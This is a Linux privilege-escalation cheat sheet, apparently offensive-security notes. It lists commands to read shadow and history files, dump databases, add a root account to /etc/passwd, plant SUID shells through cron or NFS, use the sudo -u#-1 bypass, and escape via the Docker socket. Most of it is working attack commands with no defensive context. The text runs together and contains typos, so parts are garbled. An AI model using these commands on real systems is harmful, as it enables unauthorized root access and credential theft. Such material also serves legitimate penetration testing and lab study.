-> Get system distribution and version
cat /etc/*-release-> Get kernel version
cat /proc/version
uname -a-> View variable environments
env
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
cat ~/.zshrc-> View user command history
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history-> List running processes
ps aux-> View interfaces and network information
ifconfig
ip addr-> View all active TCP connections and the TCP and UDP ports the host is listening on.
netstat -ant-> Get DNS resolver and hosts mapped to an IP
cat /etc/resolv.conf
cat /etc/hosts-> Get system user, group and password information
cat /etc/passwd
cat /etc/shadow-> psql terminal as postgres user
su postgres
psql-> list the databases
\list-> select the database
\c <database>-> list the tables
\d-> dump
select * from <table>;-> read files
CREATE TABLE demo(t text);
COPY demo from '<filename>';
SELECT * FROM demo;-> access database
sqlite3 <database.db>-> list the tables
.tables-> dump
select * from <table>;mysql -u root -h localhost -p-> list the databases
show databases;-> select the database
use <database>;-> list the tables
show tables;-> dump
SELECT * FROM <table>;-> Perform code review on web server files (/var/www/html); -> Check log files for credentials;
-> Enumeration
cat /var/log/cron.log
cat /etc/crontab-> Exploitation
echo "chmod +s /bin/bash" >> script.sh-> Enumeration
find / -perm -u=s -type f 2>/dev/nullor
id
find / -perm -u=s -type f -group <group> 2>/dev/null-> Exploitation
-> Enumeration
getcap -r / 2>/dev/null-> Exploitation
sudo -lor
cat /etc/sudoers-> Exploitation
sudo -u <username> <command>-> Enumeration
ls -la /etc/passwd
ls -la /etc/shadow-> Exploitation
echo "user:$(openssl passwd password123):0:0:root:/root:/usr/bin/bash" >> /etc/passwd-> Detection - VM Owned
cat /etc/exports-> Viewing nfs directories with access - Attacker VM
showmount -e <ip>
-> Get nfs version - Attacker VM
rpcinfo <ip>-> Mount - Attacker VM
mkdir /tmp/1
mount -o rw,vers=2 <ip>:/<nfs_directory> /tmp/1-> Creating and compiling file for privesc - Attacker VM
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x-> Exploitation - VM Owned
/tmp/x
idsudo -u#-1 /bin/bash-> Search the socket
find / -name docker.sock 2>/dev/null-> list images
docker images-> Exploitation
docker run -it -v /:/host/ <image>:<tag> chroot /host/ bash-> Linpeas
./linpeas.sh-> pspy (unprivileged Linux process snooping)
./pspy64-> linux-exploit-suggester
./linux-exploit-suggester.shor
./linux-exploit-suiggester.sh --uname <uname-string>-> Unix Privesc Check
./unix-privesc-check